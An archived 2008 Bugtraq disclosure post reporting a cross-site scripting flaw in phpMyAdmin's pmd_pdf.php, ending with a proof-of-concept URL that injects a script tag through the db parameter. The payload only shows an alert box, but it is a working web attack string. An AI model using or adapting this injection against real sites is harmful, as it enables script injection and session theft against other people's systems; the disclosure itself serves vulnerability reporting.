lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 27 Oct 2008 06:02:51 -0600 From: hadikiamarsi@...mail.com To: bugtraq@...urityfocus.com Subject: XSS in phpMyadmin Author : Hadi Kiamarsi ------------------------------------------- Discovered by : Hadi Kiamarsi ------------------------------------------- Exploited By : Hadi Kiamarsi ------------------------------------------- E-Mail : hadikiamarsi[at]hotmail.com ------------------------------------------- web site : www.ircrash.com ------------------------------------------- members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr ------------------------------------------- Sript Name : phpmyadmin ( All version ) Download Script : http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?download ------------------------------------------- XSS Exploit : register_globals=on query : http://[www.example.com]/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>